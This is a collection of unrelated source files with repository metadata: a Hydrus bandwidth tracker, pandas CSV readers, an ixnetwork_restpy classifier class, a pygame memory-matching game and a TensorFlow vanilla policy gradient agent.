search_time_delta = time_delta + window
now = HydrusData.GetNow()
since = now - search_time_delta
# we test 'now' as upper bound because a lad once had a motherboard reset and lost his clock time, ending up with a lump of data recorded several decades in the future
# I'm pretty sure this ended up in the seconds thing, so all his short-time tests were failing
return sum( ( value for ( timestamp, value ) in counter.items() if since <= timestamp <= now ) )
def _GetTimes( self, dt ):
# collapse each time portion to the latest timestamp it covers
( year, month, day, hour, minute ) = ( dt.year, dt.month, dt.day, dt.hour, dt.minute )
month_dt = datetime.datetime( year, month, 1 )
day_dt = datetime.datetime( year, month, day )
hour_dt = datetime.datetime( year, month, day, hour )
minute_dt = datetime.datetime( year, month, day, hour, minute )
month_time = int( calendar.timegm( month_dt.timetuple() ) )
day_time = int( calendar.timegm( day_dt.timetuple() ) )
hour_time = int( calendar.timegm( hour_dt.timetuple() ) )
minute_time = int( calendar.timegm( minute_dt.timetuple() ) )
second_time = int( calendar.timegm( dt.timetuple() ) )
return ( month_time, day_time, hour_time, minute_time, second_time )
def _GetUsage( self, bandwidth_type, time_delta, for_user ):
if for_user and time_delta is not None and bandwidth_type == HC.BANDWIDTH_TYPE_DATA and time_delta <= self.MIN_TIME_DELTA_FOR_USER:
usage = self._GetWeightedApproximateUsage( time_delta )
else:
usage = self._GetRawUsage( bandwidth_type, time_delta )
self._MaintainCache()
return usage
def _GetWeightedApproximateUsage( self, time_delta ):
SEARCH_DELTA = self.MIN_TIME_DELTA_FOR_USER
counter = self._seconds_bytes
now = HydrusData.GetNow()
since = now - SEARCH_DELTA
valid_timestamps = [ timestamp for timestamp in counter.keys() if since <= timestamp <= now ]
if len( valid_timestamps ) == 0:
return 0
# If we want the average speed over past five secs but nothing has happened in sec 4 and 5, we don't want to count them
# otherwise your 1MB/s counts as 200KB/s
earliest_timestamp = min( valid_timestamps )
SAMPLE_DELTA = max( now - earliest_timestamp, 1 )
total_bytes = sum( ( counter[ timestamp ] for timestamp in valid_timestamps ) )
time_delta_average_per_sec = total_bytes / SAMPLE_DELTA
return time_delta_average_per_sec * time_delta
def _MaintainCache( self ):
if HydrusData.TimeHasPassed( self._next_cache_maintenance_timestamp ):
now = HydrusData.GetNow()
oldest_second = now - self.MAX_SECONDS_TIME_DELTA
oldest_minute = now - self.MAX_MINUTES_TIME_DELTA
oldest_hour = now - self.MAX_HOURS_TIME_DELTA
oldest_day = now - self.MAX_DAYS_TIME_DELTA
def clear_counter( counter, oldest_timestamp ):
bad_keys = [ timestamp for timestamp in counter.keys() if timestamp < oldest_timestamp ]
for bad_key in bad_keys:
del counter[ bad_key ]
clear_counter( self._days_bytes, oldest_day )
clear_counter( self._days_requests, oldest_day )
clear_counter( self._hours_bytes, oldest_hour )
clear_counter( self._hours_requests, oldest_hour )
clear_counter( self._minutes_bytes, oldest_minute )
clear_counter( self._minutes_requests, oldest_minute )
clear_counter( self._seconds_bytes, oldest_second )
clear_counter( self._seconds_requests, oldest_second )
self._next_cache_maintenance_timestamp = HydrusData.GetNow() + self.CACHE_MAINTENANCE_TIME_DELTA
def GetCurrentMonthSummary( self ):
with self._lock:
num_bytes = self._GetUsage( HC.BANDWIDTH_TYPE_DATA, None, True )
num_requests = self._GetUsage( HC.BANDWIDTH_TYPE_REQUESTS, None, True )
return 'used ' + HydrusData.ToHumanBytes( num_bytes ) + ' in ' + HydrusData.ToHumanInt( num_requests ) + ' requests this month'
def GetMonthlyDataUsage( self ):
with self._lock:
result = []
for ( month_time, usage ) in list(self._months_bytes.items()):
month_dt = datetime.datetime.utcfromtimestamp( month_time )
# this generates zero-padded month, to keep this lexicographically sortable at the gui level
date_str = month_dt.strftime( '%Y-%m' )
result.append( ( date_str, usage ) )
result.sort()
return result
def GetUsage( self, bandwidth_type, time_delta, for_user = False ):
with self._lock:
if time_delta == 0:
return 0
return self._GetUsage( bandwidth_type, time_delta, for_user )
def GetWaitingEstimate( self, bandwidth_type, time_delta, max_allowed ):
with self._lock:
if time_delta is None: # this is monthly
dt = self._GetCurrentDateTime()
( year, month ) = ( dt.year, dt.month )
next_month_year = year
if month == 12:
next_month_year += 1
next_month = ( month % 12 ) + 1
next_month_dt = datetime.datetime( next_month_year, next_month, 1 )
next_month_time = int( calendar.timegm( next_month_dt.timetuple() ) )
return HydrusData.GetTimeDeltaUntilTime( next_month_time )
else:
# we want the highest time_delta at which usage is >= than max_allowed
# time_delta subtract that amount is the time we have to wait for usage to be less than max_allowed
# e.g. if in the past 24 hours there was a bunch of usage 16 hours ago clogging it up, we'll have to wait ~8 hours
( window, counter ) = self._GetWindowAndCounter( bandwidth_type, time_delta )
time_delta_in_which_bandwidth_counts = time_delta + window
time_and_values = list( counter.items() )
time_and_values.sort( reverse = True )
now = HydrusData.GetNow()
usage = 0
for ( timestamp, value ) in time_and_values:
current_search_time_delta = now - timestamp
if current_search_time_delta > time_delta_in_which_bandwidth_counts: # we are searching beyond our time delta. no need to wait
break
usage += value
if usage >= max_allowed:
return time_delta_in_which_bandwidth_counts - current_search_time_delta
return 0
def ReportDataUsed( self, num_bytes ):
with self._lock:
dt = self._GetCurrentDateTime()
( month_time, day_time, hour_time, minute_time, second_time ) = self._GetTimes( dt )
self._months_bytes[ month_time ] += num_bytes
self._days_bytes[ day_time ] += num_bytes
self._hours_bytes[ hour_time ] += num_bytes
self._minutes_bytes[ minute_time ] += num_bytes
self._seconds_bytes[ second_time ] += num_bytes
self._MaintainCache()
def ReportRequestUsed( self, num_requests = 1 ):
with self._lock:
dt = self._GetCurrentDateTime()
( month_time, day_time, hour_time, minute_time, second_time ) = self._GetTimes( dt )
self._months_requests[ month_time ] += num_requests
self._days_requests[ day_time ] += num_requests
self._hours_requests[ hour_time ] += num_requests
self._minutes_requests[ minute_time ] += num_requests
self._seconds_requests[ second_time ] += num_requests
self._MaintainCache()
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_TRACKER ] = BandwidthTracker
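# Minimal combined sketch of the two classes above (a 1 GB/day rule; the HC
# constants come from HydrusConstants as imported at the top of this file):
#   rules = BandwidthRules()
#   rules.AddRule( HC.BANDWIDTH_TYPE_DATA, 86400, 1024 * 1024 * 1024 )
#   tracker = BandwidthTracker()
#   tracker.ReportRequestUsed()
#   tracker.ReportDataUsed( 512 * 1024 )
#   rules.CanStartRequest( tracker )  # True while usage is under every rule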
|
[
"hydrus.admin@gmail.com"
] |
hydrus.admin@gmail.com
|
21ec36ee3a016d32669ac9d1be8b28dba85bb29c
|
7bc201562c3180a26438cccdb6d36c80361b848d
|
/IUM/utils/readers/pandas_reader.py
|
7032aec89b005c736442b1378659efd2cfe8599a
|
[] |
no_license
|
steciuk/IUM-recommendation-system
|
6615aa3bcdd6b367ab9ef4b85319ad4e95d68e57
|
528649ed5d1ee1b9ab1ace4980ff09d8234ef6e6
|
refs/heads/main
| 2023-03-22T13:03:33.505086
| 2021-03-18T17:33:43
| 2021-03-18T17:33:43
| 314,654,026
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 524
|
py
|
import pandas as pd
from definitions import ROOT_DIR
def read_users():
with open(f'{ROOT_DIR}/data/ver3/users.csv', encoding='utf-8') as f:
data = pd.read_csv(f)
return data
def read_products():
with open(f'{ROOT_DIR}/data/ver3/products.csv', encoding='utf-8') as f:
data = pd.read_csv(f)
return data
def read_sessions():
with open(f'{ROOT_DIR}/data/ver3/sessions.csv', encoding='utf-8') as f:
data = pd.read_csv(f)
return data
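# The three readers above differ only in the file name; a generic variant
# (a hypothetical helper, not part of the original API) could look like:
#   def read_csv_ver3(name):
#       with open(f'{ROOT_DIR}/data/ver3/{name}.csv', encoding='utf-8') as f:
#           return pd.read_csv(f)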
|
[
"steciuk77@gmail.com"
] |
steciuk77@gmail.com
|
8b4cad1be68e2f4fcefaf8bf77548f5a8969fafe
|
b144c5142226de4e6254e0044a1ca0fcd4c8bbc6
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/impairment/profile/fixedclassifier/fixedclassifier.py
|
f4d28d081bb4e76412d0bede32333114ae5ce943
|
[
"MIT"
] |
permissive
|
iwanb/ixnetwork_restpy
|
fa8b885ea7a4179048ef2636c37ef7d3f6692e31
|
c2cb68fee9f2cc2f86660760e9e07bd06c0013c2
|
refs/heads/master
| 2021-01-02T17:27:37.096268
| 2020-02-11T09:28:15
| 2020-02-11T09:28:15
| 239,721,780
| 0
| 0
|
NOASSERTION
| 2020-02-11T09:20:22
| 2020-02-11T09:20:21
| null |
UTF-8
|
Python
| false
| false
| 4,408
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class FixedClassifier(Base):
"""Specifies the packets to apply this profile to. If there are multiple patterns enabled, they are ANDed: each packet must match all packets in order to be impaired by this profile.
The FixedClassifier class encapsulates a list of fixedClassifier resources that is be managed by the user.
A list of resources can be retrieved from the server using the FixedClassifier.find() method.
The list can be managed by the user by using the FixedClassifier.add() and FixedClassifier.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'fixedClassifier'
def __init__(self, parent):
super(FixedClassifier, self).__init__(parent)
@property
def Pattern(self):
"""An instance of the Pattern class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern.Pattern)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern import Pattern
return Pattern(self)
def add(self):
"""Adds a new fixedClassifier node on the server and retrieves it in this instance.
Returns:
self: This instance with all currently retrieved fixedClassifier data using find and the newly added fixedClassifier data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the fixedClassifier data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self):
"""Finds and retrieves fixedClassifier data from the server.
All named parameters support regex and can be used to selectively retrieve fixedClassifier data from the server.
By default the find method takes no parameters and will retrieve all fixedClassifier data from the server.
Returns:
self: This instance with matching fixedClassifier data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of fixedClassifier data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the fixedClassifier data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
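# Hedged usage sketch (the parent profile object is assumed to come from the
# wider ixnetwork_restpy session hierarchy; names are illustrative):
#   fixed_classifier = profile.FixedClassifier.add()
#   found = profile.FixedClassifier.find()
#   pattern = fixed_classifier.Pattern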
|
[
"srvc_cm_packages@keysight.com"
] |
srvc_cm_packages@keysight.com
|
678d22bbbc45af9180741f592078ac3728b94c06
|
fa7f72fe2369733f8f97d2324d8e236deb6eab39
|
/Python/memory_puzzle.py
|
05c22e82d2331d3201b6f93d0b0bb2058c3c1533
|
[
"CC0-1.0"
] |
permissive
|
Gulnaz-Tabassum/hacktoberfest2021
|
bd296832f7ff07712b0b4671a8bd841d645abc29
|
ffee073f6efa4090244b55966fd69dde51be12f1
|
refs/heads/master
| 2023-08-17T13:18:17.557965
| 2021-10-08T09:52:19
| 2021-10-08T09:52:19
| 414,930,631
| 2
| 0
|
CC0-1.0
| 2021-10-08T09:52:20
| 2021-10-08T09:47:37
| null |
UTF-8
|
Python
| false
| false
| 7,829
|
py
|
import random,pygame,sys
from pygame.locals import *
fps=30
wnwidth=640
wnheight=480
revelspeed=8
boxsize=40
gapsize=10
boardwidth=10
boardheight=7
assert (boardwidth*boardheight)%2==0,'Board needs an even number of boxes for pairs of matches.'
xmargin=int((wnwidth-(boardwidth*(boxsize+gapsize)))/2)
ymargin=int((wnheight-(boardheight*(boxsize+gapsize)))/2)
gray=(100,100,100)
navyblue=(60,60,100)
white=(255,255,255)
red=(255,0,0)
green=(0,255,0)
blue=(0,0,255)
yellow=(255,255,0)
orange=(255,128,0)
purple=(255,0,255)
cyan=(0,255,255)
bgcolor=navyblue
lightbgcolor=gray
boxcolor=white
highlightcolor=blue
Donut='donut'
Square='square'
Diamond='diamond'
Lines='lines'
Oval='oval'
allcolor=(red,green,blue,yellow,orange,purple,cyan)
allshape=(Donut,Square,Diamond,Lines,Oval)
assert len(allcolor)*len(allshape)*2>=boardwidth*boardheight,"Board is too big for the number of shapes/colors defined"
def main():
global fpsclock,Display
pygame.init()
fpsclock=pygame.time.Clock()
Display=pygame.display.set_mode((wnwidth,wnheight))
mousex=0
mousey=0
pygame.display.set_caption(("Memory Puzzle"))
mainboard=getRandomizedBoard()
revealedboxes=generateRevealedBoxesData(False)
firstselection=None
Display.fill(bgcolor)
startGameAnimation(mainboard)
while True:
mouseclicked=False
Display.fill(bgcolor)
drawBoard(mainboard,revealedboxes)
for event in pygame.event.get():
if event.type==QUIT or (event.type==KEYUP and event.key==K_ESCAPE):
pygame.quit()
sys.exit()
elif event.type==MOUSEBUTTONUP:
mousex,mousey=event.pos
mouseclicked=True
boxx,boxy=getBoxAtPixel(mousex,mousey)
if boxx!=None and boxy!=None:
if not revealedboxes[boxx][boxy]:
drawHighlightBox(boxx,boxy)
if not revealedboxes[boxx][boxy] and mouseclicked:
revealBoxesAnimation(mainboard,[(boxx,boxy)])
revealedboxes[boxx][boxy]=True
if firstselection==None:
firstselection=(boxx,boxy)
else:
icon1shape,icon1color=getShapeAndColor(mainboard,firstselection[0],firstselection[1])
icon2shape,icon2color=getShapeAndColor(mainboard,boxx,boxy)
if icon1shape!=icon2shape or icon1color!=icon2color:
pygame.time.wait(1000)
coverBoxesAnimation(mainboard,[(firstselection[0],firstselection[1]),(boxx,boxy)])
revealedboxes[firstselection[0]][firstselection[1]]=False
revealedboxes[boxx][boxy]=False
elif hasWon(revealedboxes):
gameWonAnimation(mainboard)
pygame.time.wait(1000)
mainboard=getRandomizedBoard()
revealedboxes=generateRevealedBoxesData(False)
drawBoard(mainboard,revealedboxes)
pygame.display.update()
pygame.time.wait(1000)
startGameAnimation(mainboard)
firstselection=None
pygame.display.update()
fpsclock.tick(fps)
def generateRevealedBoxesData(val):
revealedboxes=[]
for i in range(boardwidth):
revealedboxes.append([val]*boardheight)
return revealedboxes
def getRandomizedBoard():
icons=[]
for color in allcolor:
for shape in allshape:
icons.append( (shape,color) )
random.shuffle(icons)
numIconsUsed= int(boardwidth*boardheight/2)
icons=icons[:numIconsUsed]*2
random.shuffle(icons)
board=[]
for x in range(boardwidth):
column=[]
for y in range(boardheight):
column.append(icons[0])
del icons[0]
board.append(column)
return board
def splitIntoGroupOf(groupsize,thelist):
result=[]
for i in range(0,len(thelist),groupsize):
result.append(thelist[i:i+groupsize])
return result
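# e.g. splitIntoGroupOf(3, [1, 2, 3, 4, 5]) -> [[1, 2, 3], [4, 5]]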
def leftTopCoordsOfBox(boxx,boxy):
left=boxx*(boxsize+gapsize)+xmargin
top=boxy*(boxsize+gapsize)+ymargin
return (left,top)
def getBoxAtPixel(x,y):
for boxx in range(boardwidth):
for boxy in range(boardheight):
left,top=leftTopCoordsOfBox(boxx,boxy)
boxRect=pygame.Rect(left,top,boxsize,boxsize)
if boxRect.collidepoint(x,y):
return (boxx,boxy)
return (None,None)
def drawIcon(shape,color,boxx,boxy):
quarter=int(boxsize*0.25)
half=int(boxsize*0.5)
left,top=leftTopCoordsOfBox(boxx,boxy)
if shape==Donut:
pygame.draw.circle(Display,color,(left+half,top+half),half-5)
pygame.draw.circle(Display,bgcolor,(left+half,top+half),quarter-5)
elif shape==Square:
pygame.draw.rect(Display,color,(left+quarter,top+quarter,boxsize-half,boxsize-half))
elif shape==Diamond:
pygame.draw.polygon(Display,color,((left+half,top),(left+boxsize-1,top+half),(left+half,top+boxsize-1),(left,top+half)))
elif shape==Lines:
for i in range(0,boxsize,4):
pygame.draw.line(Display,color,(left,top+i),(left+i,top))
pygame.draw.line(Display,color,(left+i,top+boxsize-1),(left+boxsize-1,top+i))
elif shape==Oval:
pygame.draw.ellipse(Display,color,(left,top+quarter,boxsize,half))
def getShapeAndColor(board,boxx,boxy):
return board[boxx][boxy][0],board[boxx][boxy][1]
def drawBoxCover(board,boxes,coverage):
for box in boxes:
left,top=leftTopCoordsOfBox(box[0],box[1])
pygame.draw.rect(Display,bgcolor,(left,top,boxsize,boxsize))
shape,color=getShapeAndColor(board,box[0],box[1])
drawIcon(shape,color,box[0],box[1])
if coverage>0:
pygame.draw.rect(Display,bgcolor,(left,top,coverage,boxsize))
pygame.display.update()
fpsclock.tick(fps)
def revealBoxesAnimation(board,boxesToReveal):
for coverage in range(boxsize,(-revelspeed)-1,-revelspeed):
drawBoxCover(board,boxesToReveal,coverage)
def coverBoxesAnimation(board,boxesToCover):
for coverage in range(0,boxsize+revelspeed,revelspeed):
drawBoxCover(board,boxesToCover,coverage)
def drawBoard(board,revealed):
for boxx in range(boardwidth):
for boxy in range(boardheight):
left,top=leftTopCoordsOfBox(boxx,boxy)
if not revealed[boxx][boxy]:
pygame.draw.rect(Display,boxcolor,(left,top,boxsize,boxsize))
shape,color=getShapeAndColor(board,boxx,boxy)
drawIcon(shape,color,boxx,boxy)
def drawHighlightBox(boxx,boxy):
left,top=leftTopCoordsOfBox(boxx,boxy)
pygame.draw.rect(Display,highlightcolor,(left-5,top-5,boxsize+10,boxsize+10),4)
def startGameAnimation(board):
coveredBoxes=generateRevealedBoxesData(False)
boxes=[]
for x in range(boardwidth):
for y in range(boardheight):
boxes.append((x,y))
random.shuffle(boxes)
boxGroups= splitIntoGroupOf(8,boxes)
drawBoard(board,coveredBoxes)
for boxGroup in boxGroups:
revealBoxesAnimation(board,boxGroup)
coverBoxesAnimation(board,boxGroup)
def gameWonAnimation(board):
coveredBoxes=generateRevealedBoxesData(True)
color1=lightbgcolor
color2=bgcolor
for i in range(13):
color1,color2=color2,color1
Display.fill(color1)
drawBoard(board,coveredBoxes)
pygame.display.update()
pygame.time.wait(300)
def hasWon(revealedBoxes):
for i in revealedBoxes:
if False in i:
return False
return True
if __name__=='__main__':
main()
|
[
"mishrajitendra227@gmail.com"
] |
mishrajitendra227@gmail.com
|
3b426af60e4124804c4a06843f6ed5f94cda8311
|
a964615ecce097846f8e36d338394c54802cf790
|
/sit_il/models/rl/npg/vpg/vpg_continuous_agent.py
|
f33848319b6f4c81eab6a0c08f08967b631e53fa
|
[] |
no_license
|
edwardyulin/sit_project
|
c0b3333252090408637846c1f4b6f2e1e6e9f574
|
dd3e877c0ad281e39af2df68ab5c002d83677ccc
|
refs/heads/master
| 2023-09-05T17:37:58.371763
| 2021-10-29T07:59:54
| 2021-10-29T07:59:54
| 414,883,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,107
|
py
|
#imports
from typing import List, Optional, Tuple, Any, Dict, Union
import tempfile
from pathlib import Path
import numpy as np
from dataclasses import field, dataclass
import pandas as pd
import gym
import wandb
import tensorflow as tf
from tensorflow.keras.utils import plot_model
from sit_il.models.rl.npg.vpg.mlp_critic import MLPCritic
from sit_il.models.rl.npg.vpg.mlp_continuous_actor import MLPContinuousActor
from sit_il.helpers import compute_discounted_return
@dataclass
class Trajectories:
""" Storing trajectories """
# observation is represented as an array of [car_position, car_velocity]
observations: List[np.ndarray] = field(default_factory=list)
# action is represented as a float in the range of [-1.0, 1.0]
actions: List[float] = field(default_factory=list)
# critic value from the output of the critic network
critic_values: List[float] = field(default_factory=list)
    # a reward of 100 is awarded if the agent reaches the flag (position = 0.45) on top of the mountain.
    # the reward is decreased based on the amount of energy consumed each step.
rewards: List[float] = field(default_factory=list)
def append(self,
observation: np.ndarray,
action: float,
critic_value: float,
reward: float
) -> None:
self.observations.append(observation)
self.actions.append(action)
self.critic_values.append(critic_value)
self.rewards.append(reward)
class VPGContinuousAgent:
""" Vanilla Policy Gradient agent for environments with continuous actions space """
actor: MLPContinuousActor
critic: MLPCritic
def __init__(self,
env: gym.Env
):
""" Define variables for VPGContinuousAgent"""
self.model_name = self.__class__.__name__
self.env = env
self.observation_size = self.env.observation_space.shape[0]
self.action_size = self.env.action_space.shape[0]
self.is_in_wandb_session = False
self.config: Dict[str, Union[int, float, str]] = {}
self.history: Dict[str, List[Union[int, float]]] = {
"episode": [],
"count_steps": [],
"total_reward": [],
"actor_loss": [],
"critic_loss": []
}
def pipeline(self,
actor_hidden_units: List[int],
critic_hidden_units: List[int],
actor_learning_rate: float,
critic_learning_rate: float,
n_train_episodes: int,
max_episode_length: int,
discount_rate: float,
n_test_episodes: int,
print_summary: bool,
plot_actor_network_to_file: Optional[Path],
plot_critic_network_to_file: Optional[Path],
save_actor_network_to_file: Optional[Path],
save_critic_network_to_file: Optional[Path],
load_actor_network_from_file: Optional[Path],
load_critic_network_from_file: Optional[Path]
) -> None:
"""Run the pipeline including building, training, and testing the agent."""
with wandb.init(
project="sit_vpg_door",
entity="edward_lin",
tags=[self.model_name],
resume=False,
config={
"env_name": self.env.spec.id,
"observation_size": self.observation_size,
"action_size": self.action_size,
"actor_hidden_units": actor_hidden_units,
"critic_hidden_units": critic_hidden_units,
"actor_learning_rate": actor_learning_rate,
"critic_learning_rate": critic_learning_rate,
"n_train_episodes": n_train_episodes,
"max_episode_length": max_episode_length,
"discount_rate": discount_rate,
"n_test_episodes": n_test_episodes,
},
):
self.is_in_wandb_session = True
self.config = wandb.config
if load_actor_network_from_file and load_critic_network_from_file:
# load actor and critic networks instead of training
self.load(load_actor_network_from_file, load_critic_network_from_file)
else:
# build actor and critic networks
self.build(
observation_size=self.config["observation_size"],
action_size=self.config["action_size"],
actor_hidden_units=self.config["actor_hidden_units"],
critic_hidden_units=self.config["critic_hidden_units"],
actor_learning_rate=self.config["actor_learning_rate"],
critic_learning_rate=self.config["critic_learning_rate"],
)
# visualize model architecture
if print_summary:
self.summary()
# drawing the structures of actor and critic networks to file
# note that actor network is different between continuous and discrete action space
actor_plot_file, critic_plot_file = self.render_networks(
plot_actor_network_to_file,
plot_critic_network_to_file
)
# log the images of networks onto wandb
wandb.log(
{
"actor_architecture": wandb.Image(str(actor_plot_file)),
"critic_architecture": wandb.Image(str(critic_plot_file))
}
)
# train the agent
self.fit(
n_episodes=self.config["n_train_episodes"],
max_episode_length=self.config["max_episode_length"],
discount_rate=self.config["discount_rate"]
)
# save after training
if save_actor_network_to_file and save_critic_network_to_file:
self.save(save_actor_network_to_file, save_critic_network_to_file)
# evaluate the agent and log results onto wandb
results = self.evaluate(n_episodes=n_test_episodes)
            # An episode succeeds if "what"
print(
"Evaluation results:\n"
" count_steps: "
f"{results['count_steps_mean']:.4f} ยฑ {results['count_steps_std']:.4f}\n"
" total_reward: "
f"{results['total_reward_mean']:.4f} ยฑ {results['total_reward_std']:.4f}",
)
# Log evaluation results
wandb.log(
{
"evaluation_results": wandb.Table(
dataframe=pd.DataFrame(results, index=[0])
)
}
)
self.is_in_wandb_session = False # finished logging on wandb
def build(self,
observation_size: int,
action_size: int,
actor_hidden_units: List[int],
critic_hidden_units: List[int],
actor_learning_rate: float,
critic_learning_rate: float,
              load_bc_network: Optional[Path] = None
) -> None:
""" Construct actor network and critic network """
self.actor = MLPContinuousActor()
self.actor.build(
observation_size=observation_size, #input of the network
output_size=action_size, # output of one float value to represent the action (instead of prob. of actions seen in discrete)
hidden_units=actor_hidden_units,
learning_rate=actor_learning_rate,
load_bc_network=load_bc_network
)
self.critic = MLPCritic()
self.critic.build(
obs_size=observation_size,
hidden_units=critic_hidden_units,
learning_rate=critic_learning_rate,
)
def summary(self) -> None:
""" Print the summary of the actor and critic networks """
print("Actor network:")
print(self.actor.model.summary())
print()
print("=======================")
print("Critic network:")
print(self.critic.model.summary())
def render_networks(self,
actor_to_file: Optional[Path] = None,
critic_to_file: Optional[Path] = None
) -> Tuple[Any, Any]:
""" Visualize the structure (input, hidden, output) of actor and critic networks"""
if actor_to_file is None:
_, temp_file = tempfile.mkstemp(suffix=".jpg")
actor_to_file = Path(temp_file) # find the path of temp_file
if critic_to_file is None:
_, temp_file = tempfile.mkstemp(suffix=".jpg")
critic_to_file = Path(temp_file) # find the path of temp_file
plot_model(
self.actor.model,
to_file=actor_to_file,
show_shapes=True,
show_dtype=True
),
plot_model(
self.critic.model,
to_file=critic_to_file,
show_shapes=True,
show_dtype=True
)
return actor_to_file, critic_to_file
    def normalize_data(self,
                       data: np.ndarray):
        """Clip action values into the fixed range [min_value, max_value]."""
        max_value = 2
        min_value = -1
        norm = np.clip(data, min_value, max_value)
        return norm
def fit(self,
n_episodes: int,
max_episode_length: int,
            discount_rate: float
) -> None:
""" Train the agent"""
for episode in range(n_episodes):
observation = self.env.reset()
step = 0
total_reward = 0.0
done = False
print("Initial State: ", observation)
trajectories = Trajectories()
while not done:
step += 1
if step > max_episode_length:
break
# selecting an action
# observation = [
# [ s1, s2 ]
# ] -> action = [
# [ a1 ], (-1 <= a1 <= 1)
# ]
action = self.actor.model.predict(np.atleast_2d(np.squeeze(observation)))
# only take the first argument, don't need batch_size
action = self.normalize_data(action[0])
#print(action)
next_observation, reward, done, _ = self.env.step(action)
critic_value = self.critic.model.predict(np.atleast_2d(np.squeeze(observation)))[0, 0]
total_reward += reward
trajectories.append(
observation=np.squeeze(observation),
action=action,
critic_value=critic_value,
reward=reward
)
observation = next_observation
# Compute rewards-to-go (= discounted_returns) (Pseudocode line 4)
# Rewards-to-go: a weighted sum of all the rewards for all steps in the episode
discounted_returns = compute_discounted_return(
rewards=trajectories.rewards,
discount_rate=discount_rate
)
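            # compute_discounted_return comes from sit_il.helpers; a minimal sketch
            # of the recurrence it is assumed to implement (working backwards):
            #   returns[t] = rewards[t] + discount_rate * returns[t+1]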
# Compute advantage estimate (Pseudocode line 5)
advantages = np.subtract(discounted_returns, trajectories.critic_values)
# Calculate actor loss (Pseudocode line 6-7)
actor_loss = self.actor.fit(
observations=np.atleast_2d(trajectories.observations),
actions=trajectories.actions,
advantages=advantages
)
# Calculate critic loss (Pseudocode line 8)
critic_loss = self.critic.fit(
obs=np.atleast_2d(trajectories.observations),
discounted_returns=np.expand_dims(discounted_returns, axis=1)
)
# log training results
self._log_history(episode, step, total_reward, actor_loss, critic_loss)
def evaluate(self,
n_episodes: int
) -> Dict[str, float]:
"""Evaluate the agent"""
count_steps_history = []
total_reward_history = []
for episode in range(n_episodes):
observation = self.env.reset()
step = 0
total_reward = 0.0
done = False
while not done:
action = self.act(observation)
action = self.normalize_data(action)
new_observation, reward, done, _ = self.env.step(action)
self.env.render()
step += 1
total_reward += reward
observation = new_observation
print(
f"Episode {episode}:\n"
f" count_steps = {step}\n"
f" total_reward = {total_reward}",
)
print()
count_steps_history.append(step)
total_reward_history.append(total_reward)
return {
"count_steps_mean": np.mean(count_steps_history),
"count_steps_std": np.std(count_steps_history),
"total_reward_mean": np.mean(total_reward_history),
"total_reward_std": np.std(total_reward_history),
}
def act(self,
observation: np.ndarray
) -> np.ndarray:
"""Return an action given the input observation"""
return self.actor.model.predict(np.atleast_2d(np.squeeze(observation)))[0]
def _log_history(self,
episode: int,
count_steps: int,
total_reward: float,
actor_loss: float,
critic_loss: float
) -> None:
"""Log training restuls """
self.history["episode"].append(episode)
self.history["count_steps"].append(count_steps)
self.history["total_reward"].append(total_reward)
self.history["actor_loss"].append(actor_loss)
self.history["critic_loss"].append(critic_loss)
if self.is_in_wandb_session:
# Log relevant graphs on wandb
wandb.log(
{
"episode": episode,
"count_steps": count_steps,
"total_reward": total_reward,
"actor_loss": actor_loss,
"critic_loss": critic_loss,
},
)
def save(self, actor_to_file: Path, critic_to_file: Path)->None:
"""Save the actor and critic to file."""
self.actor.save(actor_to_file)
self.critic.save(critic_to_file)
def load(self, actor_from_file: Path, critic_from_file: Path) ->None:
"""Load the actor and critic."""
self.actor = tf.keras.models.load_model(actor_from_file)
self.critic = tf.keras.models.load_model(critic_from_file)
|
[
"67679083+edwardyulin@users.noreply.github.com"
] |
67679083+edwardyulin@users.noreply.github.com
|
58b3db9657a0382c8a7ea0ee22ebded1e7d0734f
|
de392462a549be77e5b3372fbd9ea6d7556f0282
|
/accounts/migrations/0129_auto_20210526_0952.py
|
1c06372188954ab5ff13971cdb0cf2f166006a10
|
[] |
no_license
|
amutebe/AMMS_General
|
2830770b276e995eca97e37f50a7c51f482b2405
|
57b9b85ea2bdd272b44c59f222da8202d3173382
|
refs/heads/main
| 2023-07-17T02:06:36.862081
| 2021-08-28T19:07:17
| 2021-08-28T19:07:17
| 400,064,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
